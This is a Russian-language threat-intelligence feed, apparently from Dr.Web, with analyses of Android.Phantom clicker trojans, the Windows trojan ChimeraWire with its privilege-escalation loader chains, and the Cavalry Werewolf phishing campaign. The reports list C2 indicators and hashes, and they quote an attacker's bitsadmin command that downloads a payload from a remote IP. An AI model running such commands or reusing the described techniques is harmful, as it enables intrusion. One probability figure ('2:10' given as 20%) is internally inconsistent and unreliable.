Горячая лента угроз

Трояны семейства Android.Phantom проникают в смартфоны вместе с играми и пиратскими модами популярных приложений. Они используют машинное обучение и видеотрансляции для накрутки кликов

Wed, 21 Jan 2026 05:00:00 GMT

21 января 2026 года

Специалисты антивирусной лаборатории «Доктор Веб» обнаружили и исследовали новое семейство троянов с функциональностью кликера. Их объединяет одна особенность: они либо управляются с сервера hxxps[:]//dllpgd[.]click, либо загружаются и выполняются по команде с него. Вредоносное ПО данного типа заражает смартфоны на ОС Android.

Один из каналов распространения троянов — официальный каталог приложений для устройств Xiaomi GetApps.

Нам удалось отследить несколько мобильных игр, которые содержат вредоносное ПО: Creation Magic World (более 32 тыс. скачиваний), Cute Pet House (>34 тыс. скачиваний), Amazing Unicorn Party (>13 тыс. скачиваний), Академия мечты Сакура (>4 тыс. скачиваний), Theft Auto Mafia (>61 тыс. скачиваний), Open World Gangsters (>11 тыс. скачиваний). Все зараженные игры выложены от лица одного разработчика, SHENZHEN RUIREN NETWORK CO., LTD., троянцы вшиты в них и запускаются вместе с приложениями.

В первоначальных версиях игр вредоносного ПО не было. 28/29 сентября разработчик публикует обновления для игр, в которые встроен троян Android.Phantom.2.origin. Он работает в двух режимах, которые в коде программы условно называются режим сигнализации (signaling) и фантом (phantom).

В режиме phantom вредоносное ПО использует скрытый от пользователя встроенный браузер на основе виджета WebView. В него по команде с сервера hxxps[:]//playstations[.]click загружается целевой сайт для накрутки кликов и файл JavaScript «phantom». Последний содержит в себе сценарий для автоматизации действий на рекламных объявлениях загруженного сайта и фреймворк машинного обучения TensorFlowJS. Модель для этого фреймворка загружается с сервера hxxps[:]//app-download[.]cn-wlcb[.]ufileos[.]com в директорию приложения. В сценариях для работы с некоторыми видами рекламы Android.Phantom.2.origin размещает браузер на виртуальном экране и делает скриншоты. Троян анализирует их с помощью модели для фреймворка TensorFlowJS, а затем кликает по обнаруженным элементам.

В альтернативном режиме signaling троянец подключается к стороннему серверу при помощи WebRTC. Эта технология позволяет браузерам и приложениям устанавливать прямое соединение для обмена данными, аудио и видео в режиме реального времени без установки дополнительного ПО. В режиме signaling уже упомянутый hxxps[:]//dllpgd[.]click выполняет роль сигнального сервера, устанавливающий соединения между узлами WebRTC. Также данный сервер определяет режим работы трояна, phantom или signaling. Задачи с целевыми сайтами приходят от hxxps[:]//playstations[.]click. Далее Android.Phantom.2.origin тайно от пользователя транслирует злоумышленникам видео виртуального экрана с загруженным в браузер сайтом. Троянец дает возможность подключенному узлу WebRTC удаленно управлять браузером на виртуальном экране: кликать, скроллить, вводить или вставлять текст в форму для ввода.

15/16 октября вышеуказанные игры получили еще одно обновление. В дополнение к Android.Phantom.2.origin в них встроили модуль Android.Phantom.5. Он является дроппером, который содержит внутри себя загрузчик удаленного кода Android.Phantom.4.origin. Эта программа загружает еще несколько троянов, предназначенных для имитации кликов на различных сайтах. Эти модули проще кликера Android.Phantom.2.origin — они не используют машинное обучение или видеотрансляции, а руководствуются сценариями для кликов, написанных на JavaScript.

Чтобы использовать технологию WebRTC на Android, трояну необходимо подключить специальную библиотеку с Java API, которая не входит в состав стандартной ОС и скачанных приложений. Поэтому поначалу троян работал преимущественно в режиме phantom. С добавлением в приложения Android.Phantom.5, троян Android.Phantom.2.origin получил возможность использовать загрузчик удаленного кода Android.Phantom.4.origin для загрузки необходимой библиотеки.

Злоумышленники используют также и другие каналы распространения троянов Android.Phantom.2.origin и Android.Phantom.5. К примеру, моды музыкального стриминга Spotify с разблокированными premium функциями. Они размещаются на различных сайтах, вот несколько примеров:

Сайт Spotify Plus

Сайт Spotify Pro

И в специальных телеграм-каналах:

Spotify Pro
(54 400 подписчиков)

Spotify Plus – Official
(15 057 подписчиков)

Моды Spotify, размещенные на сайтах и в указанных на скриншотах телеграм-каналах, содержат Android.Phantom.2.origin и библиотеку для организации связи по стандарту WebRTC под Android.

Кроме модов Spotify, злоумышленники вшивают трояны в моды других популярных приложений: YouTube, Deezer, Netflix и др. Они размещены на специальных сайтах с модами:

Сайт Apkmody

Сайт Moddroid

Сайт Moddroid содержит раздел «Выбор редакции». Из 20 приложений в нем только 4 были чистыми. Остальные 16 содержали трояны семейства Android.Phantom. Приложения на этих двух сайтах загружаются с одного CDN-сервера hxxps[:]//cdn[.]topmongo[.]com. У этих сайтов есть свои телеграм-каналы, где пользователи скачивают зараженные троянам моды:

Moddroid.com
(87 653 подписчика)

Apkmody Chat
(6 297 подписчиков)

Также для своих целей преступники используют сервера Discord. Самый большой из них — Spotify X, около 24 тысяч подписчиков.

Администраторы Discord-серверов не стесняются напрямую предлагать зараженные моды. Например, на скриншоте выше администратор от лица сервера предлагает скачать мод музыкального стриминга Deezer вместо Spotify, поскольку последний перестал работать.

По ссылке скачивается рабочий мод. Его код защищен коммерческим упаковщиком, внутри которого скрывается троян Android.Phantom.1.origin. Это загрузчик удаленного кода, по команде с сервера hxxps[:]//dllpgd[.]click он загружает уже нам знакомые Android.Phantom.2.origin, Android.Phantom.5 и троян-шпион Android.Phantom.5.origin. Последний отправляет информацию об устройстве злоумышленникам, в том числе номер телефона, геолокацию, список установленных приложений.

Этот скриншот с сервера показывает, на каких языках говорят пользователи, которые становятся объектами заражения. Для доступа к чатам на языках, отличных от английского, необходимо поставить реакцию с соответствующим флагом. Больше всего отметились пользователи, говорящие на испанском, французском, немецком, польском и итальянском языках (не считая английского, который является основным языком сервера). Также администраторы сервера не предусмотрели чатов для многих стран Азии.

Трояны могут нанести существенный вред владельцам зараженных устройств. Перечислим несколько возможных исходов:

Невольное соучастие. Смартфон пользователя может быть использован в качестве бота при DDoS-атаке, тем самым делая владельца невольным соучастником киберпреступления.
Незаконная активность. Через устройство злоумышленники могут совершать незаконную онлайн-деятельность, к примеру, использовать смартфон в мошеннических схемах или рассылать спам-сообщения.
Повышенное потребление заряда и трафика. Посторонняя деятельность разряжает аккумулятор и расходует интернет-трафик.
Утечка персональных данных. Android.Phantom.5.origin является шпионом и может передавать данные об устройстве и владельце.

Трояны этого семейства представляют угрозу для владельцев мобильных устройств на Android, не защищенных актуальным антивирусным ПО. Российские пользователи испытывают трудности с регистрацией в зарубежных приложениях или оплатой подписок. Ситуация подталкивает искать и использовать альтернативные, зачастую полулегальные, способы получения услуг этих компаний. Эта ситуация на руку вирусописателям, ведь пользователям приходится рисковать и доверять сомнительным вариантам. Особую группу риска составляют дети, которые не думают о правилах цифровой гигиены, желая всего лишь поиграть, послушать музыку или посмотреть видеоклипы.

Мы рекомендуем не скачивать моды на сомнительных сайтах и в каналах. Как правило, проверка источников модов или приложений требует времени, опыта и насмотренности. Поэтому лучший вариант обеспечить себе и своим близким гарантированное спокойствие — использовать Dr.Web Security Space для мобильных устройств. Он защитит не только ваши смартфоны, но и другие умные устройства: игровые консоли, планшеты, smartTV.

Индикаторы компрометации
Подробнее о Android.Phantom.1.origin
Подробнее о Android.Phantom.2.origin
Подробнее о Android.Phantom.3
Подробнее о Android.Phantom.4.origin
Подробнее о Android.Phantom.5
Подробнее о Android.Phantom.5.origin

Беллерофонту такое и не снилось. Троян ChimeraWire накручивает популярность сайтов, искусно притворяясь человеком

Mon, 08 Dec 2025 09:44:54 GMT

8 декабря 2025 года

Введение

В ходе анализа одной из партнерских программ специалисты компании «Доктор Веб» обнаружили уникальное ВПО с функциональностью кликера, получившее наименование Trojan.ChimeraWire. Оно работает на компьютерах под управлением ОС Windows и основано на проектах с открытым исходным кодом zlsgo и Rod для автоматизированного управления веб-сайтами и веб-приложениями.

Trojan.ChimeraWire позволяет злоумышленникам имитировать действия пользователей и накручивать поведенческий фактор веб-сайтов, искусственно поднимая их рейтинг в выдаче поисковых систем. Для этого вредоносная программа выполняет поиск нужных интернет-ресурсов в системах Google и Bing, после чего открывает их. Она также имитирует действия пользователей, самостоятельно нажимая на ссылки на загруженных сайтах. Троян совершает все вредоносные действия через браузер Google Chrome, который он скачивает с определенного ресурса и запускает в скрытом режиме отладки по протоколу WebSocket.

Trojan.ChimeraWire попадает на компьютеры в результате работы нескольких вредоносных программ-загрузчиков. Они используют различные техники повышения привилегий на основе эксплуатации уязвимостей класса DLL Search Order Hijacking, а также антиотладочные приемы с целью избежать обнаружения. Наша антивирусная лаборатория отследила как минимум 2 цепочки заражения с их участием. В одной из них центральное место занимает вредоносный скрипт Python.Downloader.208, а в другой — вредоносная программа Trojan.DownLoader48.61444, которая по принципу работы схожа с Python.Downloader.208 и фактически выступает его альтернативой.

В данном исследовании мы рассмотрим особенности Trojan.ChimeraWire и вредоносных программ, которые доставляют его на устройства пользователей.

Первая цепочка заражения

Схема, иллюстрирующая первую цепочку заражения

Первая цепочка начинается с трояна Trojan.DownLoader48.54600. Он проверяет, не работает ли в искусственной среде, и завершает работу, если обнаруживает признаки виртуальной машины или режима отладки. Если таких признаков нет, троян скачивает с C2-сервера ZIP-архив python3.zip. В нем находится вредоносный Python-скрипт Python.Downloader.208, а также необходимые для его работы вспомогательные файлы — в частности, вредоносная библиотека ISCSIEXE.dll (Trojan.Starter.8377). Trojan.DownLoader48.54600 распаковывает архив и запускает скрипт. Тот является второй ступенью заражения и представляет собой загрузчик, который скачивает с C2-сервера следующую стадию.

Поведение Python.Downloader.208 зависит от того, какими правами он обладает при запуске. Если скрипт запущен без прав администратора, он пытается их получить. Для этого извлеченный вместе с ним Trojan.Starter.8377 копируется в каталог %LOCALAPPDATA%\Microsoft\WindowsApps. Кроме того, создается скрипт runs.vbs, который в дальнейшем будет использован для повторного запуска Python.Downloader.208.

Далее Python.Downloader.208 запускает системное приложение %SystemRoot%\SysWOW64\iscsicpl.exe. Из-за наличия в нем уязвимости класса DLL Search Order Hijacking оно автоматически загружает троянскую библиотеку ISCSIEXE.dll, имя которой совпадает с именем легитимного компонента ОС Windows.

В свою очередь, Trojan.Starter.8377 запускает VBS-скрипт runs.vbs, и тот повторно исполняет Python.Downloader.208 — уже с правами администратора.

При запуске с необходимыми привилегиями Python.Downloader.208 скачивает с C2-сервера защищенный паролем архив onedrive.zip. В нем находится следующая стадия заражения — вредоносная программа Trojan.DownLoader48.54318 в виде библиотеки с именем UpdateRingSettings.dll — и необходимые для ее работы вспомогательные файлы (например, легитимное приложение OneDrivePatcher.exe из ОС Windows с действительной цифровой подписью, относящееся к ПО OneDrive).

После распаковки архива Python.Downloader.208 создает задачу в системном планировщике на запуск программы OneDrivePatcher.exe при старте системы. Далее он запускает это приложение. Из-за наличия в нем уязвимости DLL Search Order Hijacking оно автоматически загружает вредоносную библиотеку UpdateRingSettings.dll, имя которой совпадает с именем компонента ПО OneDrive.

Получив управление, Trojan.DownLoader48.54318 проверяет, не работает ли он в искусственной среде. При обнаружении одного из признаков работы в виртуальной машине или в режиме отладки он прекращает работу.

Если такие признаки не обнаруживаются, троянская библиотека пытается скачать с C2-сервера полезную нагрузку, а также ключи шифрования для ее расшифровки.

Расшифрованная полезная нагрузка представляет собой ZLIB-контейнер, внутри которого находится шеллкод и исполняемый файл. После расшифровки контейнера Trojan.DownLoader48.54318 пытается распаковать его. Если это не удается, то троян самоудаляется, а сам процесс завершает работу. В случае успеха управление передается шеллкоду, задача которого — разжать идущий вместе с ним исполняемый файл. Данный файл является последней стадией заражения — целевым трояном Trojan.ChimeraWire.

Вторая цепочка заражения

Вторая цепочка начинается с вредоносной программы Trojan.DownLoader48.61444. При запуске она проверяет наличие прав администратора и при их отсутствии пытается их получить. Троян использует технику Masquerade PEB для обхода системы защиты, маскируясь под легитимный процесс explorer.exe.

Затем он вносит патч в копию системной библиотеки %SystemRoot%\System32\ATL.dll. Для этого Trojan.DownLoader48.61444 считывает ее содержимое, добавляет в нее расшифрованный байт-код и путь до своего файла, после чего сохраняет модифицированную версию в виде файла dropper в той же директории, где он расположен. Далее троян инициализирует объекты COM-модели оболочки Windows для сервиса %SystemRoot%\System32\wbem и измененной библиотеки. Если инициализация проходит успешно, Trojan.DownLoader48.61444 пытается получить права администратора через использование COM-интерфейса CMSTPLUA, эксплуатируя уязвимость, характерную для некоторых старых COM-интерфейсов.

В случае успеха модифицированная библиотека dropper копируется в каталог %SystemRoot%\System32\wbem в виде файла ATL.dll. После этого Trojan.DownLoader48.61444 запускает системную оснастку управления WMI WmiMgmt.msc. В результате происходит эксплуатация уязвимости DLL Search Order Hijacking в системном приложении mmc.exe, которое автоматически загружает библиотеку %SystemRoot%\System32\wbem\ATL.dll с патчем. Она, в свою очередь, повторно запускает Trojan.DownLoader48.61444, но уже с правами администратора.

Схема работы Trojan.DownLoader48.61444 при отсутствии прав администратора

При запуске от имени администратора Trojan.DownLoader48.61444 исполняет несколько PowerShell-скриптов для скачивания полезной нагрузки с C2-сервера. Одним из загружаемых объектов является ZIP-архив one.zip. В нем находятся файлы, аналогичные файлам из архива onedrive.zip из первой цепочки (в частности, легитимная программа OneDrivePatcher.exe и вредоносная библиотека UpdateRingSettings.dll — Trojan.DownLoader48.54318).

Trojan.DownLoader48.61444 распаковывает архив и в системном планировщике создает задачу на автозапуск OneDrivePatcher.exe при загрузке системы. Троян также непосредственно запускает это приложение. Так же, как и в первой цепочке, при запуске в OneDrivePatcher.exe происходит эксплуатация уязвимости DLL Search Order Hijacking и автоматическая загрузка троянской библиотеки UpdateRingSettings.dll. Далее цепочка заражения повторяет первый сценарий.

При этом Trojan.DownLoader48.61444 скачивает и второй ZIP-архив: two.zip. В нем находится вредоносный скрипт Python.Downloader.208 (update.py), а также файлы, необходимые для его запуска. Среди них — Guardian.exe — переименованный консольный интерпретатор языка Python pythonw.exe.

После распаковки архива Trojan.DownLoader48.61444 создает в системном планировщике задачу на автозапуск Guardian.exe при загрузке системы. Кроме того, он непосредственно исполняет через это приложение вредоносный скрипт Python.Downloader.208.

Частично дублируя первую цепочку заражения, злоумышленники, по всей видимости, стремились повысить вероятность успешной загрузки Trojan.ChimeraWire в целевые системы.

Схема работы Trojan.DownLoader48.61444 с правами администратора

Trojan.ChimeraWire

Trojan.ChimeraWire получил свое имя на основе сочетания слов «chimera» (в переводе с англ. «химера» — мифическое существо с частями тел нескольких животных) и «wire» (в переводе с англ. «провод»). Слово «chimera» описывает гибридную природу применяемых злоумышленниками методик: использование троянов-загрузчиков, написанных на разных языках, а также антиотладочные техники и эскалация привилегий в процессе заражения. Кроме того, оно отражает то, что троян представляет собой комбинацию различных фреймворков, плагинов и легального ПО, через которое осуществляется скрытое управление трафиком. Отсюда вытекает второе слово «wire»: оно отсылает к невидимой и вредоносной работе трояна с сетью.

Попадая на целевой компьютер, Trojan.ChimeraWire скачивает со стороннего сайта ZIP-архив chrome-win.zip с браузером Google Chrome для ОС Windows. Отметим, что на этом ресурсе также хранятся архивы со сборками Google Chrome и для других систем, таких как Linux и macOS — в том числе для различных аппаратных платформ.

Сайт с различными сборками браузера Google Chrome, откуда троян загружает необходимый архив

После скачивания браузера Trojan.ChimeraWire пытается незаметно установить в него расширения NopeCHA и Buster, предназначенные для автоматизированного распознавания капчи (CAPTCHA). Данные расширения будут в дальнейшем использоваться трояном в процессе его работы.

Далее он запускает браузер в режиме отладки без видимого окна, что позволяет выполнять вредоносную деятельность, не привлекая внимания пользователя. После этого происходит подключение к выбранному автоматически порту отладки по протоколу WebSocket.

Вслед за этим троян переходит к получению заданий. Он отправляет запрос на C2-сервер и получает в ответ base64-строку, в которой скрыта зашифрованная алгоритмом AES-GCM конфигурация в формате JSON.

Пример конфигурации, которую трояну передает C2-сервер

В ней находятся задания и связанные с ними параметры:

целевая поисковая система (поддерживаются системы Google и Bing);
ключевые фразы для поиска сайтов в заданной поисковой системе и их последующего открытия;
максимальное количество последовательных переходов по веб-страницам;
случайные распределения для выполнения автоматических кликов на веб-страницах;
время ожидания загрузки страниц;
целевые домены.

Для дополнительной имитации деятельности реального человека и обхода систем, отслеживающих постоянную активность, в конфигурации также предусмотрены параметры, отвечающие за паузы между сессиями работы.

Имитация кликов мышью пользователем

Trojan.ChimeraWire способен выполнять клики следующих видов:

для навигации по поисковой выдаче;
для открытия найденных релевантных ссылок в новых фоновых вкладках.

Вначале Trojan.ChimeraWire через нужную поисковую систему выполняет поиск сайтов по доменам и ключевым фразам, указанным в конфигурации. Далее он открывает полученные в поисковой выдаче сайты и находит на них все HTML-элементы, которые определяют гиперссылки. Троян помещает их в массив данных и перемешивает его, чтобы объекты в нем располагались в последовательности, отличной от последовательности на веб-странице. Это делается для обхода антибот-защиты сайтов, которая может отслеживать порядок нажатий.

Затем Trojan.ChimeraWire проверяет, работоспособны ли найденные ссылки и совпадают ли строки в них с заданным шаблоном из конфигурации, после чего подсчитывает общее количество совпадений. Дальнейшие действия трояна зависят от получившегося числа.

Если на странице было выявлено достаточное количество подходящих ссылок, Trojan.ChimeraWire сканирует страницу и сортирует найденные ссылки по релевантности (наиболее соответствующие ключевым словам ссылки идут первыми). После этого выполняется клик по одной или нескольким подходящим ссылкам.

Если же совпадений с заданным шаблоном недостаточно или их нет вовсе, вредоносная программа использует алгоритм с вероятностной моделью поведения, который максимально имитирует действия настоящего пользователя. На основе параметров из конфигурации при помощи взвешенного случайного распределения Trojan.ChimeraWire определяет количество ссылок, по которым необходимо перейти. Например, распределение ["1:90", "2:10"] означает, что Trojan.ChimeraWire кликнет 1 ссылку с вероятностью 90%, и 2 ссылки — с вероятностью 20%. Таким образом, с большой долей вероятности вредоносная программа должна перейти по одной ссылке. Троян случайным образом выбирает ссылку из составленного ранее массива и выполняет клик.

После каждого перехода по ссылке из поисковой выдачи и выполнения кликов на загружаемой странице троян, в зависимости от задачи, возвращается на предыдущую вкладку или переходит к следующей. Алгоритм действий повторяется до тех пор, пока не будет исчерпан лимит по кликам для целевых веб-сайтов.

Ниже представлены примеры сайтов, параметры для взаимодействия с которыми поступали трояну в заданиях от C2-сервера:

Подробные технические описания трояна ChimeraWire и вредоносных программ, участвующих в его загрузке, находятся в PDF-версии исследования и в вирусной библиотеке компании «Доктор Веб».

Подробнее о Trojan.ChimeraWire
Подробнее о Trojan.DownLoader48.54600
Подробнее о Trojan.Starter.8377
Подробнее о Python.Downloader.208
Подробнее о Trojan.DownLoader48.54318
Подробнее о Trojan.DownLoader48.61444

Заключение

В настоящее время вредоносная деятельность Trojan.ChimeraWire фактически сводится к выполнению относительно простых задач кликера по накрутке популярности веб-сайтов. Вместе с тем, функциональные возможности лежащих в его основе утилит позволяют трояну решать более широкий спектр задач — в том числе совершать автоматизированные действия под видом активности настоящих пользователей. Так, с его помощью злоумышленники могут заполнять веб-формы — например, на сайтах, проводящих опросы в рекламных целях. Кроме того, они могут использовать его для считывания содержимого веб-страниц и создания их скриншотов — как с целью кибершпионажа, так и для автоматического сбора информации для наполнения различных баз данных (например, с почтовыми адресами, номерами телефонов и т. п.).

Таким образом, в будущем возможно появление новых версий Trojan.ChimeraWire, где эти и другие функции будут реализованы в полной мере. Специалисты компании «Доктор Веб» продолжают следить за развитием этого трояна.

MITRE ATT&CK®

Этап	Техника
Выполнение	Выполнение с участием пользователя (T1204) Вредоносный файл (T1204.002) Вредоносная библиотека (T1204.005) PowerShell (T1059.001) Командная оболочка Windows (T1059.003) Visual Basic (T1059.005) Python (T1059.006) Планировщик заданий Windows (T1053.005)
Закрепление	Ключи запуска в реестре Windows / Каталог автозагрузки (T1547.001) Запланированная задача / задание (T1053)
Повышение привилегий	Перехват потока исполнения: перехват поиска DLL (T1574.001) Обход контроля учетных записей (T1548.002)
Предотвращение обнаружения	Зашифрованный / закодированный файл (T1027.013) Уклонение от отладки (T1622) Скрытое окно (T1564.003) Исключения для файла или пути (T1564.012) Деобфускация / декодирование файлов или данных (T1140) Перехват потока исполнения: перехват поиска DLL (T1574.001)
Организация управления	Двусторонняя связь (T1102.002) Веб-протоколы (T1071.001)

Индикаторы компрометации

Хакерская группировка Cavalry Werewolf атакует российские государственные учреждения

Thu, 06 Nov 2025 00:00:00 GMT

6 ноября 2025 года

Введение

В июле 2025 года в компанию «Доктор Веб» обратился клиент из государственного сектора Российской Федерации с подозрением о возможной компрометации внутренней сети. Гипотеза возникла в связи с тем, что клиент зафиксировал рассылку нежелательных сообщений с одного из корпоративных почтовых ящиков. Проведенное нашей антивирусной лабораторией расследование инцидента показало, что учреждение подверглось целевой атаке со стороны хакерской группировки, которую специалисты «Доктор Веб» идентифицировали как Cavalry Werewolf. Одной из целей кампании был сбор конфиденциальной информации и данных о конфигурации сети.

В ходе экспертизы удалось выявить ранее неизвестные вредоносные программы, в том числе инструменты с открытым исходным кодом. Среди них — различные бэкдоры, позволяющие дистанционно выполнять команды в атакуемых системах и подготовить площадку для разведки и дальнейшего закрепления в сетевой инфраструктуре.

В данном исследовании мы расскажем о выявленных инструментах хакеров Cavalry Werewolf, рассмотрим особенности группировки и характерные для злоумышленников действия в скомпрометированной сети.

Общие сведения об атаке и используемые инструменты

Для получения первоначального доступа к одному из компьютеров злоумышленники использовали распространенный вектор проникновения — фишинговые электронные письма с прикрепленным к ним вредоносным ПО, замаскированным под документы. В данном случае сообщения содержали неизвестный на момент атаки бэкдор BackDoor.ShellNET.1, который основан на ПО с открытым кодом Reverse-Shell-CS. Он позволяет дистанционно подключаться к зараженным компьютерам через обратный шелл и выполнять различные команды. Эта вредоносная программа располагалась в защищенном паролем архиве и, в зависимости от рассылки, имела различные имена.

Варианты имен файлов BackDoor.ShellNET.1
Службеная записка от 16.06.2025___________________________.exe
О ПРЕДОСТАВЛЕНИИ ИНФОРМАЦИИ ДЛЯ ПОДГОТОВКИ СОВЕЩАНИЯ.exe
О проведении личного приема граждан список участников.exe
О работе почтового сервера план и проведенная работа.exe

Пример фишингового письма с BackDoor.ShellNET.1. Атакующие предлагают потенциальной жертве ознакомиться с «документом» и указывают пароль для распаковки архива

Используя BackDoor.ShellNET.1, злоумышленники продолжили закрепление в целевой системе. Они загрузили несколько вредоносных программ через стандартное для ОС Windows средство Bitsadmin (C:\Windows\SysWOW64\bitsadmin.exe), предназначенное для управления заданиями по передаче файлов. Приложение запускалось с набором определенных ключей командной строки и от имени текущего администратора системы, как показано на примере ниже:

cmd: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/winpot.exe 
C:\users\public\downloads\winpot.exe

Первой из угроз, загруженных через BackDoor.ShellNET.1, была троянская программа-стилер Trojan.FileSpyNET.5. С ее помощью киберпреступники скачали хранившиеся на компьютере документы в форматах .doc, .docx, .xlsx и .pdf, текстовые файлы (.txt), а также изображения (.jpg, .png).

Затем атакующие установили бэкдор BackDoor.Tunnel.41 (представляет собой ПО с открытым исходным кодом ReverseSocks5) с целью создания SOCKS5-туннелей и незаметного подключения к компьютеру для дальнейшего выполнения на нем команд, в том числе — с возможностью установки другого вредоносного ПО.

Инструменты Cavalry Werewolf

Расследование данного инцидента позволило выявить не только указанные выше вредоносные приложения, но и множество других инструментов группировки, которые хакеры используют для проведения таргетированных атак. Отметим, что вирусописатели из Cavalry Werewolf не ограничиваются единым набором вредоносных программ и постоянно пополняют свой арсенал. Поэтому инструменты для проникновения в целевые системы, а также последующие в цепочке заражения стадии могут отличаться в зависимости от атакуемой организации.

Точка входа

Вредоносные программы в фишинговых письмах от Cavalry Werewolf являются первыми ступенями в цепочке заражения. При этом они могут быть представлены разным типом вредоносного ПО. Вирусные аналитики «Доктор Веб» выявили следующие варианты:

скрипты (BAT.DownLoader.1138);
исполняемые файлы (Trojan.Packed2.49708, Trojan.Siggen31.54011, BackDoor.Siggen2.5463, BackDoor.RShell.169, BackDoor.ReverseShell.10).

BAT.DownLoader.1138

Является пакетным файлом, который загружает в целевую систему PowerShell-бэкдор PowerShell.BackDoor.109. С его помощью злоумышленники скачивают и запускают на компьютере другие вредоносные программы.

Известные имена файлов BAT.DownLoader.1138	SHA1-хеш	С2-сервер
scan26_08_2025.bat	d2106c8dfd0c681c27483a21cc72d746b2e5c18c	168[.]100.10[.]73

Trojan.Packed2.49708

Устанавливает бэкдор BackDoor.Spy.4033, который в зашифрованном виде хранится в его теле. Этот бэкдор позволяет атакующим выполнять команды в инфицированной системе через обратный шелл.

Известные имена файлов Trojan.Packed2.49708	SHA1-хеш	С2-сервер
О проведении личного приема граждан список участников план и проведенная работа.exe C:\Windows\2o1nzu.exe	5684972ded765b0b08b290c85c8fac8ed3fea273	185[.]173.37[.]67
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe	29ee3910d05e248cfb3ff62bd2e85e9c76db44a5	185[.]231.155[.]111
О работе почтового сервера план и проведенная работа.exe Программный офис Управления Организации Объединенных Наций по наркотикам и преступности (УНП ООН).exe План-протокол встречи о сотрудничестве представителей должн.лиц.exe	ce4912e5cd46fae58916c9ed49459c9232955302	109[.]172.85[.]95
C:\Windows\746wljxfs.exe	653ffc8c3ec85c6210a416b92d828a28b2353c17	185[.]173.37[.]67
—	b52e1c9484ab694720dc62d501deca2aa922a078	109[.]172.85[.]95

Trojan.Siggen31.54011

Устанавливает бэкдор BackDoor.Spy.4038, который в зашифрованном виде хранится в его теле. Этот бэкдор позволяет атакующим выполнять команды в инфицированной системе через обратный шелл.

Trojan.Siggen31.54011 функционально схож с вредоносной программой Trojan.Packed2.49708, но имеет несколько иной алгоритм извлечения полезной нагрузки.

SHA1-хеш	С2-сервер
baab225a50502a156222fcc234a87c09bc2b1647	109[.]172.85[.]63
93000d43d5c54b07b52efbdad3012e232bdb49cc	109[.]172.85[.]63

BackDoor.Siggen2.5463

Выполняет задания киберпреступников и управляется ими через Telegram-бот. Основная функциональность вредоносной программы расположена в PowerShell-коде, скрытом в ее теле.

Известные имена файлов BackDoor.Siggen2.5463	SHA1-хеш	Полезная нагрузка
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe system.exe	c96beb026dc871256e86eca01e1f5ba2247a0df6	PowerShell.BackDoor.108

BackDoor.RShell.169

Позволяет злоумышленникам дистанционно подключаться к зараженным компьютерам через обратный шелл для выполнения различных команд.

Известные имена файлов BackDoor.RShell.169	SHA1-хеш	С2-сервер
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe Информация по письму в МИД от 6 июля статус и прилагаемые документы.exe	633885f16ef1e848a2e057169ab45d363f3f8c57	109[.]172.85[.]63

BackDoor.ReverseShell.10

Запускает обратный шелл и обеспечивает злоумышленникам дистанционный доступ к системе.

Известные имена файлов BackDoor.ReverseShell.10	SHA1-хеш	С2-сервер
к проектам.exe Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа проектов к проектам.exe	dd98dcf6807a7281e102307d61c71b7954b93032	195[.]2.78[.]133
Служебная записка от 20.08.2025 .exe Служебная записка от 12.08.2025 .exe	f546861adc7c8ca88e3b302d274e6fffb63de9b0	62[.]113.114[.]209

Последующие ступени заражения

Нами были обнаружены следующие вредоносные программы, которые могут в дальнейшем устанавливаться на зараженные устройства после компрометации:

Trojan.Inject5.57968

Троянская программа с зашифрованным в ее теле бэкдором, который позволяет атакующим загружать вредоносные приложения на зараженный компьютер. Расшифровка полезной нагрузки выполняется в несколько шагов, на одном из которых вредоносный массив данных инжектируется в процесс приложения aspnet_compiler.exe из пакета Microsoft .NET Framework. В дальнейшем полностью расшифрованный бэкдор работает в контексте процесса этого легитимного приложения.

Изучение активности Trojan.Inject5.57968 при помощи «песочницы» интерактивного анализатора угроз Dr.Web vxCube

Известные имена файлов Trojan.Inject5.57968	SHA1-хеш	С2-сервер	Полезная нагрузка
pickmum1.exe	e840c521ec436915da71eb9b0cfd56990f4e53e5	64[.]95.11[.]202	Trojan.PackedNET.3351
mummyfile1.exe	22641dea0dbe58e71f93615c208610f79d661228	64[.]95.11[.]202	Trojan.PackedNET.3351

BackDoor.ShellNET.2

Бэкдор, который управляется через Telegram-бот и выполняет команды атакующих.

Известные имена файлов BackDoor.ShellNET.2	SHA1-хеш
win.exe	1957fb36537df5d1a29fb7383bc7cde00cd88c77

BackDoor.ReverseProxy.1

Бэкдор на основе открытого ПО ReverseSocks5, запускающий обратный SOCS5-прокси в инфицированной системе для получения дистанционного доступа к компьютеру. BackDoor.ReverseProxy.1 запускается через командную строку cmd.exe с параметром -connect IP для подключения к нужному сетевому адресу. Известны модификации бэкдора с зашитыми адресами.

Выявлены следующие IP:

78[.]128.112[.]209 (указывался в параметре запуска)
96[.]9.125[.]168 (указывался в параметре запуска)
188[.]127.231[.]136 (зашит в коде)

Известные имена файлов BackDoor.ReverseProxy.1	SHA1-хеш
revv2.exe	6ec8a10a71518563e012f4d24499b12586128c55

Trojan.Packed2.49862

Trojan.Packed2.49862 — это троянские версии легитимных программ, в которые злоумышленники внедрили вредоносный код. Вирусные аналитики «Доктор Веб» встречали вредоносные модификации архиваторов WinRar и 7-Zip, средства разработки Visual Studio Code, текстового редактора AkelPad и ряда других приложений. Среди них, например, была программа Sumatra PDF Reader, которую киберпреступники выдавали за мессенджер MAX. Такие модификации перестают выполнять основную функциональность и при запуске инициализируют только добавленную к ним троянскую часть.

В зависимости от целей киберпреступников в этих модификациях могут скрываться самые разные вредоносные программы. Среди них:

BackDoor.ReverseProxy.1 (ReverseSocks5)
BackDoor.Shell.275 (AdaptixC2)
BackDoor.AdaptixC2.11 (AdaptixC2)
BackDoor.Havoc.16 (Havoc)
BackDoor.Meterpreter.227 (CobaltStrike)
Trojan.Siggen9.56514 (AsyncRAT)
Trojan.Clipper.808

Известные имена файлов Trojan.Packed2.49862	SHA1-хеш	С2-сервер	Полезная нагрузка
code.exe rev2.exe	8279ad4a8ad20bf7bbca0fc54428d6cdc136b776	188[.]127.231[.]136	BackDoor.ReverseProxy.1
code.exe revv.exe	a2326011368d994e99509388cb3dc132d7c2053f	192[.]168.11[.]10	BackDoor.ReverseProxy.1
